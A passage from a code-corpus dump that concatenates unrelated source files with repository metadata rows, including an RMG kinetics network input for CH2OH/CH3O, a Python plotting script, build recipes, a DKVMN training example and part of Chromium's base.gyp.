thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.79372,-0.00990833,3.7322e-05,-3.79285e-08,1.31773e-11,-14379.2,0.602798], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.16953,0.00619321,-2.25056e-06,3.65976e-10,-2.20149e-14,-14548.7,6.04208], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-119.055,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH2O""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'OH(5)',
structure = SMILES('[OH]'),
E0 = (28.372,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3287.46],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (17.0073,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.4858,0.00133397,-4.70043e-06,5.64379e-09,-2.06318e-12,3411.96,1.99788], Tmin=(100,'K'), Tmax=(1005.25,'K')), NASAPolynomial(coeffs=[2.88225,0.00103869,-2.35652e-07,1.40229e-11,6.34581e-16,3669.56,5.59053], Tmin=(1005.25,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(28.372,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""OH""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CH2(19)',
structure = SMILES('[CH2]'),
E0 = (381.563,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1032.72,2936.3,3459],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.8328,0.000224446,4.68033e-06,-6.04743e-09,2.59009e-12,45920.8,1.40666], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.16229,0.00281798,-7.56235e-07,5.05446e-11,5.65236e-15,46099.1,4.77656], Tmin=(1000,'K'), Tmax=(3000,'K'))], Tmin=(200,'K'), Tmax=(3000,'K'), E0=(381.563,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29226.7,5.11107], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29226.7,5.11107], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CH3(17)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = '[CH2][O](167)',
structure = SMILES('[CH2][O]'),
E0 = (192.903,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (30.026,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.88409,-0.00363885,3.28543e-05,-4.13611e-08,1.59631e-11,23210.8,7.47983], Tmin=(100,'K'), Tmax=(933.06,'K')), NASAPolynomial(coeffs=[6.69335,0.000289989,8.61416e-07,-1.56351e-10,7.33778e-15,21991.3,-9.6043], Tmin=(933.06,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(192.903,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(128.874,'J/(mol*K)'), comment="""Thermo library: Klippenstein_Glarborg2016 + radical(H3COJ) + radical(CsJOH)"""),
)
species(
label = 'HCOH(T)(285)',
structure = SMILES('[CH]O'),
E0 = (205.906,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1277.5,1000,403.876,3308.82],'cm^-1')),
HinderedRotor(inertia=(0.0103144,'amu*angstrom^2'), symmetry=1, barrier=(22.7121,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (30.026,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.75938,0.0029613,8.90411e-06,-1.35016e-08,5.39816e-12,24775.6,6.76286], Tmin=(100,'K'), Tmax=(940.429,'K')), NASAPolynomial(coeffs=[5.09112,0.00321239,-9.31686e-07,1.59615e-10,-1.15729e-14,24263.5,-0.971], Tmin=(940.429,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(205.906,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(78.9875,'J/(mol*K)'), label="""HCOH(T)""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (136.795,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (109.772,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (404.696,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (409.935,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (417.698,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (111.178,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (404.696,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (379.192,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction5',
reactants = ['CH2OH(24)'],
products = ['H(3)', 'CH2O(15)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(7.37e+10,'s^-1'), n=0.811, Ea=(39558.7,'cal/mol'), T0=(1,'K'), comment="""Kinetics taken from the arrheniusHigh attribute of a Troe/Lindemann exprssion. Originally from reaction library Klippenstein_Glarborg2016"""),
)
reaction(
label = 'reaction2',
reactants = ['CH2OH(24)'],
products = ['CH3O(25)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(25600,'s^-1'), n=2.36, Ea=(138.49,'kJ/mol'), T0=(1,'K'), Tmin=(600,'K'), Tmax=(2000,'K'), comment="""Matched reaction 345 CH3O <=> CH3O-2 in intra_H_migration/training
This reaction matched rate rule [R2H_S;O_rad_out;Cs_H_out_2H]
family: intra_H_migration"""),
)
reaction(
label = 'reaction6',
reactants = ['H(3)', '[CH2][O](167)'],
products = ['CH2OH(24)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(4.34601e+06,'m^3/(mol*s)'), n=0.278532, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction7',
reactants = ['OH(5)', 'CH2(19)'],
products = ['CH2OH(24)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(1355.7,'m^3/(mol*s)'), n=1.40819, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [O_rad;Birad] for rate rule [O_pri_rad;Birad]
Euclidian distance = 1.0
family: Birad_R_Recombination
Ea raised from -12.0 to 0 kJ/mol."""),
)
reaction(
label = 'reaction5',
reactants = ['H(3)', 'HCOH(T)(285)'],
products = ['CH2OH(24)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction1',
reactants = ['CH3O(25)'],
products = ['H(3)', 'CH2O(15)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(1.13e+10,'s^-1'), n=1.21, Ea=(24068.8,'cal/mol'), T0=(1,'K'), comment="""Kinetics taken from the arrheniusHigh attribute of a Troe/Lindemann exprssion. Originally from reaction library Klippenstein_Glarborg2016"""),
)
reaction(
label = 'reaction3',
reactants = ['H(3)', '[CH2][O](167)'],
products = ['CH3O(25)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(4.34601e+06,'m^3/(mol*s)'), n=0.278532, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction4',
reactants = ['O(4)', 'CH3(17)'],
products = ['CH3O(25)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_methyl;O_birad]
Euclidian distance = 2.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
network(
label = '80',
isomers = [
'CH2OH(24)',
'CH3O(25)',
],
reactants = [
('H(3)', 'CH2O(15)'),
('OH(5)', 'CH2(19)'),
('O(4)', 'CH3(17)'),
],
bathGas = {
'N2': 0.5,
'Ne': 0.5,
},
)
pressureDependence(
label = '80',
Tmin = (300,'K'),
Tmax = (2000,'K'),
Tcount = 8,
Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
Pmin = (0.01,'bar'),
Pmax = (100,'bar'),
Pcount = 5,
Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"qin.she@husky.neu.edu"
] | qin.she@husky.neu.edu |
9ebae106d0ffd798ae05342b8bf2684406293bbf | 33836016ea99776d31f7ad8f2140c39f7b43b5fe | /fip_collab/2016_01_28_gsh_database_codes/plot_slice_compare_uniaxial2cyclic.py | d45d2d052bb44de92754eebaa18e75b9cd20c0cf | [] | no_license | earthexploration/MKS-Experimentation | 92a2aea83e041bfe741048d662d28ff593077551 | 9b9ff3b468767b235e7c4884b0ed56c127328a5f | refs/heads/master | 2023-03-17T23:11:11.313693 | 2017-04-24T19:24:35 | 2017-04-24T19:24:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import h5py
f = h5py.File('slice.hdf5', 'r')
slc_uni = f.get('slice_uni')[...].real
slc_cyc = f.get('slice_cyc')[...].real
par = f.get('parameters')[...]
f.close()
th = np.round(par[0]*180./np.pi, 2)
phi2 = np.round(par[1]*180./np.pi, 0)
en = np.round(par[2], 4)
fig = plt.figure(num=1, figsize=[14, 8])
ax = fig.add_subplot(111, projection='3d')
ax.scatter(slc_uni[:, 1], slc_uni[:, 2], slc_uni[:, 5], c='b')
ax.scatter(slc_cyc[:, 1], slc_cyc[:, 2], slc_cyc[:, 5], c='r')
title_text = "theta = %s, phi2 = %s, en = %s" % (th, phi2, en)
ax.set_title(title_text)
ax.set_xlabel('phi1')
ax.set_ylabel('Phi')
ax.set_zlabel('FIP')
plt.show()
| [
"noahhpaulson@gmail.com"
] | noahhpaulson@gmail.com |
6f03b5b578c7f4027dd73f0fbcbb4198d4c5e38f | 15b3b60252af3e5ebd8be4a9fbcccc96469acaad | /pre_clean.py | 30bfe2e18f4c68a8065eef0a6895f5ac0df7ba16 | [] | no_license | yingl/jkb | b6d50cd5d5ba64798a28f6948f1490f334f52b97 | fdf68dee5fbe5a9cfbf2a41af78d2f2ec16a459c | refs/heads/master | 2020-03-28T11:59:47.752625 | 2020-01-23T06:49:46 | 2020-01-23T06:49:46 | 148,262,569 | 10 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,231 | py | import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-fi',
'--filein',
type=str)
parser.add_argument('-fo',
'--fileout',
type=str)
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
fi = args.filein
fo = args.fileout
with open(fi, 'r', encoding='utf-8') as fi:
text = fi.read()
text = text.replace('<h2>', '## ')
text = text.replace('</h2>', '')
text = text.replace('<h3>', '### ')
text = text.replace('</h3>', '')
text = text.replace('<strong>', '<b>')
text = text.replace('</strong>', '</b>')
text = text.replace('<p>', '')
text = text.replace('</p>', '')
text = text.replace('<ul>', '')
text = text.replace('</ul>', '')
text = text.replace('<ol>', '')
text = text.replace('</ol>', '')
text = text.replace('<li>', '')
text = text.replace('</li>', '')
text = text.replace('<center>', '')
text = text.replace('</center>', '')
with open(fo, 'w+', encoding='utf-8') as fo:
fo.write(text) | [
"linying_43151@163.com"
] | linying_43151@163.com |
517a5b458cf820892048f7df658197d34e5aadd7 | c1869b7106a4651ecc0f0f53b82d5f11021896e3 | /examples/DKVMN/DKVMN.py | 22aaa5b5608ca405710ad4a60415fbe0a2e2f8ae | [
"MIT"
] | permissive | bigdata-ustc/XKT | 6efd7ff5b09c22ed9099f5b9b614edceff1cada0 | b3ac07541b92001b62d7cff4e8fe7e5a69c5c93c | refs/heads/master | 2021-09-22T19:22:25.563651 | 2021-09-16T02:56:10 | 2021-09-16T02:56:10 | 194,855,614 | 18 | 9 | MIT | 2021-09-16T02:56:11 | 2019-07-02T12:06:12 | Python | UTF-8 | Python | false | false | 699 | py | # coding: utf-8
# 2021/5/26 @ tongshiwei
import mxnet as mx
from XKT.DKVMN import etl
from XKT import DKVMN
batch_size = 32
train = etl("../../data/a0910c/train.json", batch_size=batch_size)
valid = etl("../../data/a0910c/valid.json", batch_size=batch_size)
test = etl("../../data/a0910c/test.json", batch_size=batch_size)
model = DKVMN(
hyper_params=dict(
ku_num=146,
key_embedding_dim=10,
value_embedding_dim=10,
key_memory_size=20,
hidden_num=100
)
)
model.train(train, valid, end_epoch=2)
model.save("dkvmn")
model = DKVMN.from_pretrained("dkvmn")
print(model.eval(test))
inputs = mx.nd.ones((2, 3))
outputs, _ = model(inputs)
print(outputs) | [
"tongsw@mail.ustc.edu.cn"
] | tongsw@mail.ustc.edu.cn |
a5669df662c5cbc0c978c08431dfe48e19ea5151 | bf4178e73f0f83781be6784d7587cb34a38d6edd | /platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/ocelot/filters/phy_filters.py | e49ca3348ff7ba8253f8aecb5959917a02921b04 | [] | no_license | kolbertv/ZigbeeSiliconV3 | 80d70515e93be1413c24cdcb3485f50c65a1564b | ab0bd8d4bb6c1048adef81d0e66d96006c2fabd9 | refs/heads/master | 2023-01-02T07:18:01.393003 | 2020-10-25T15:33:08 | 2020-10-25T15:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,896 | py | """
Lynx specific filters
"""
from pyradioconfig.calculator_model_framework.interfaces.iphy_filter import IPhyFilter
class PhyFilters(IPhyFilter):
#Studio black list (files removed before Studio distribution)
customer_phy_groups = [
'Phys_Internal_Base_Customer_Aclara',
'Phys_Internal_Base_Customer_Acuity',
'Phys_Internal_Base_Customer_Chamberlain',
'Phys_Internal_Base_Customer_Essence',
'Phys_Internal_Base_Customer_HoneywellEnergyAxis',
'Phys_Internal_Base_Customer_Lutron',
'Phys_Internal_Base_Customer_Sigfox',
'Phys_Internal_Base_Experimental',
'Phys_Internal_Base_Utility',
'Phys_Internal_Base_ValOnly',
'Phys_Internal_Connect',
'Phys_Internal_Longrange',
'Phys_Internal_RAIL_Base_Standard_BLE',
'Phys_Internal_RAIL_Base_Standard_IEEE802154',
'Phys_RAIL_Base_Standard_BLE',
'Phys_RAIL_Base_Standard_IEEE802154',
'Phys_RAIL_Base_Standard_IEEE802154GB',
'Phys_RAIL_Base_Standard_ZWave',
]
#Studio white list (these PHYs show in Studio as proprietary starting points)
simplicity_studio_phy_groups = ['Phys_Studio_Base', 'Phys_Studio_Base_Standard_SUNFSK', 'Phys_Studio_Connect',
'Phys_Studio_LongRange', 'Phys_Studio_MBus','Phys_Studio_WiSUN']
# Special designation for simulation PHYs
sim_tests_phy_groups = []
# Special designation for non-functional PHYs
non_functional_phy_groups = [] | [
"1048267279@qq.com"
] | 1048267279@qq.com |
69d80edf9f62e78f34fc9b40f7ed035eb1dba0cd | 1adc05008f0caa9a81cc4fc3a737fcbcebb68995 | /hardhat/recipes/notmuch.py | 2d64141806c5209a2c04e5546647640e733fe6b2 | [
"MIT",
"BSD-3-Clause"
] | permissive | stangelandcl/hardhat | 4aa995518697d19b179c64751108963fa656cfca | 1ad0c5dec16728c0243023acb9594f435ef18f9c | refs/heads/master | 2021-01-11T17:19:41.988477 | 2019-03-22T22:18:44 | 2019-03-22T22:18:52 | 79,742,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | from .base import GnuRecipe
class NotMuchRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(NotMuchRecipe, self).__init__(*args, **kwargs)
self.sha256 = 'b4bf09ec9b7b64180704faa26d66cad5' \
'f911a5a00ef812da34cb02c3f8872831'
self.name = 'notmuch'
self.version = '0.25.1'
self.version_regex = r'(?P<version>\d+\.\d+\.\d+)'
self.version_url = 'https://notmuchmail.org/releases'
self.depends = ['autotools', 'gmime', 'python3-sphinx',
'talloc', 'xapian']
self.url = 'https://notmuchmail.org/releases/notmuch-$version.tar.gz'
self.configure_args += ['--without-ruby']
# needed to make sphinx test pass to install manpages
self.environment['PYTHON'] = 'python3'
| [
"clayton.stangeland@gmail.com"
] | clayton.stangeland@gmail.com |
6eb155a4ac3b2b0359f9044b2ae585107b9319e7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03149/s623046352.py | 95d3c7f2b6e2b5f32f1a52e47749d1a99cffe089 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | print("YES" if set(map(int,input().split()))=={1,9,7,4} else "NO") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
a74c31405dbceed57f5ce2704ff493613ace4432 | ceed8ee18ab314b40b3e5b170dceb9adedc39b1e | /android/external/libchrome/base/base.gyp | dc484f4a4a62b0d2aa9804b29ba98c235dc7f7a3 | [
"BSD-3-Clause"
] | permissive | BPI-SINOVOIP/BPI-H3-New-Android7 | c9906db06010ed6b86df53afb6e25f506ad3917c | 111cb59a0770d080de7b30eb8b6398a545497080 | refs/heads/master | 2023-02-28T20:15:21.191551 | 2018-10-08T06:51:44 | 2018-10-08T06:51:44 | 132,708,249 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 60,092 | gyp | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'includes': [
'../build/win_precompile.gypi',
'base.gypi',
],
'targets': [
    {
      # Core cross-platform utility library. Built for both the host and
      # target toolsets; its type follows the 'component' build variable
      # (shared_library in component builds, static_library otherwise).
      'target_name': 'base',
      'type': '<(component)',
      'toolsets': ['host', 'target'],
      'variables': {
        'base_target': 1,
        'enable_wexit_time_destructors': 1,
        'optimize': 'max',
      },
      'dependencies': [
        'base_debugging_flags#target',
        'base_static',
        '../testing/gtest.gyp:gtest_prod',
        '../third_party/modp_b64/modp_b64.gyp:modp_b64',
        'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
      ],
      # TODO(gregoryd): direct_dependent_settings should be shared with the
      # 64-bit target, but it doesn't work due to a bug in gyp
      'direct_dependent_settings': {
        'include_dirs': [
          '..',
        ],
      },
      'conditions': [
        # Desktop Linux / Chrome OS builds use the in-tree symbolizer and
        # xdg_mime; Chrome OS additionally includes the *_chromeos.cc sources.
        # All other platforms exclude the xdg_user_dirs and *_nss.cc sources.
        ['desktop_linux == 1 or chromeos == 1', {
          'conditions': [
            ['chromeos==1', {
              'sources/': [ ['include', '_chromeos\\.cc$'] ]
            }],
          ],
          'dependencies': [
            'symbolize',
            'xdg_mime',
          ],
          'defines': [
            'USE_SYMBOLIZE',
          ],
        }, {  # desktop_linux == 0 and chromeos == 0
          'sources/': [
            ['exclude', '/xdg_user_dirs/'],
            ['exclude', '_nss\\.cc$'],
          ],
        }],
        ['use_glib==1', {
          'dependencies': [
            '../build/linux/system.gyp:glib',
          ],
          'export_dependent_settings': [
            '../build/linux/system.gyp:glib',
          ],
        }],
        ['OS == "android" and _toolset == "host"', {
          # Always build base as a static_library for host toolset, even if
          # we're doing a component build. Specifically, we only care about the
          # target toolset using components since that's what developers are
          # focusing on. In theory we should do this more generally for all
          # targets when building for host, but getting the gyp magic
          # per-toolset for the "component" variable is hard, and we really only
          # need base on host.
          'type': 'static_library',
          # Base for host support is the minimum required to run the
          # ssl false start blacklist tool. It requires further changes
          # to generically support host builds (and tests).
          # Note: when building for host, gyp has OS == "android",
          # hence the *_android.cc files are included but the actual code
          # doesn't have OS_ANDROID / ANDROID defined.
          'conditions': [
            # A Mac host has no Linux-specific implementations available.
            ['host_os == "mac"', {
              'sources/': [
                ['exclude', '^native_library_linux\\.cc$'],
                ['exclude', '^process_util_linux\\.cc$'],
                ['exclude', '^sys_info_linux\\.cc$'],
                ['exclude', '^sys_string_conversions_linux\\.cc$'],
                ['exclude', '^worker_pool_linux\\.cc$'],
              ],
            }],
          ],
        }],
        ['OS == "android" and _toolset == "target"', {
          'dependencies': [
            'base_java',
            'base_jni_headers',
            '../build/android/ndk.gyp:cpu_features',
            '../third_party/ashmem/ashmem.gyp:ashmem',
          ],
          'link_settings': {
            'libraries': [
              '-llog',
            ],
          },
          'sources!': [
            'debug/stack_trace_posix.cc',
          ],
        }],
        ['os_bsd==1', {
          'include_dirs': [
            '/usr/local/include',
          ],
          'link_settings': {
            'libraries': [
              '-L/usr/local/lib -lexecinfo',
            ],
          },
        }],
        ['OS == "linux"', {
          'link_settings': {
            'libraries': [
              # We need rt for clock_gettime().
              '-lrt',
              # For 'native_library_linux.cc'
              '-ldl',
            ],
          },
          'conditions': [
            ['use_allocator!="tcmalloc"', {
              'defines': [
                'NO_TCMALLOC',
              ],
              'direct_dependent_settings': {
                'defines': [
                  'NO_TCMALLOC',
                ],
              },
            }],
          ],
        }],
        ['OS == "win"', {
          # Specify delayload for base.dll.
          'msvs_settings': {
            'VCLinkerTool': {
              'DelayLoadDLLs': [
                'cfgmgr32.dll',
                'powrprof.dll',
                'setupapi.dll',
              ],
              'AdditionalDependencies': [
                'cfgmgr32.lib',
                'powrprof.lib',
                'setupapi.lib',
              ],
            },
          },
          # Specify delayload for components that link with base.lib.
          'all_dependent_settings': {
            'msvs_settings': {
              'VCLinkerTool': {
                'DelayLoadDLLs': [
                  'cfgmgr32.dll',
                  'powrprof.dll',
                  'setupapi.dll',
                ],
                'AdditionalDependencies': [
                  'cfgmgr32.lib',
                  'powrprof.lib',
                  'setupapi.lib',
                ],
              },
            },
          },
          # Ship the dbghelp.dll from build/win/dbghelp_xp next to the
          # build products.
          'copies': [
            {
              'destination': '<(PRODUCT_DIR)/',
              'files': [
                '../build/win/dbghelp_xp/dbghelp.dll',
              ],
            },
          ],
          'dependencies': [
            'trace_event/etw_manifest/etw_manifest.gyp:etw_manifest',
          ],
        }],
        ['OS == "mac" or (OS == "ios" and _toolset == "host")', {
          'link_settings': {
            'libraries': [
              '$(SDKROOT)/System/Library/Frameworks/AppKit.framework',
              '$(SDKROOT)/System/Library/Frameworks/ApplicationServices.framework',
              '$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
              '$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
              '$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
              '$(SDKROOT)/System/Library/Frameworks/IOKit.framework',
              '$(SDKROOT)/System/Library/Frameworks/Security.framework',
            ],
          },
        }],
        ['OS == "ios" and _toolset != "host"', {
          'link_settings': {
            'libraries': [
              '$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
              '$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
